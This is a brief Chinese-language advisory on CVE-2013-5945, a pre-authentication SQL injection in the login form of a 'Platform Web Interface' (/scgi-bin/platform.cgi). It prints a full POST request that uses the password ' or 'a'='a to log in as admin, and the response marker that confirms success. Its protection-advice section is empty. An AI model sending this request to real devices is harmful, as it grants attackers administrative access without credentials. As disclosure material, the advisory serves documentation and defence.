Platform Web Interface 预认证 SQL 注入漏洞(CVE-2013-5945) 是一个严重的安全问题,允许攻击者在无需认证的前提下,通过构造恶意用户名或密码字段,绕过身份验证逻辑,成功登录系统并获得管理权限。
漏洞影响范围:
应用层 → 身份验证绕过
攻击者无需凭证即可访问受保护资源。
该漏洞存在于 Web 界面登录表单的后端处理逻辑中,攻击者可通过向 /scgi-bin/platform.cgi 发送特制的登录请求,将 SQL 注入语句嵌入用户名或密码字段,从而绕过认证机制。
攻击请求示例:
POST /scgi-bin/platform.cgi HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded
Referer: https://192.168.0.1/scgi-bin/platform.cgi
User-Agent: Exploit
thispage=index.htm&
Users.UserName=admin&
Users.Password=' or 'a'='a&
button.login.Users.deviceStatus=Login&
Login.userAgent=Exploit
其中:
Users.Password=' or 'a'='a 为典型的 SQL 注入语句根本原因:
攻击者使用如下密码构造进行登录:
用户名:admin
密码:' or 'a'='a
若服务器响应中包含以下标志,则表示登录成功:
<a href="?page=index.htm">Logout</a>set-cookie 字段,用于建立已认证的用户会话效果: 攻击者以管理员身份访问受限界面。
防护建议:
📝 作者:ahlien 📧 邮箱:mfs24@mails.tsinghua.edu.cn
🏫 单位:Tsinghua University
📅 最后更新时间:2025-07-30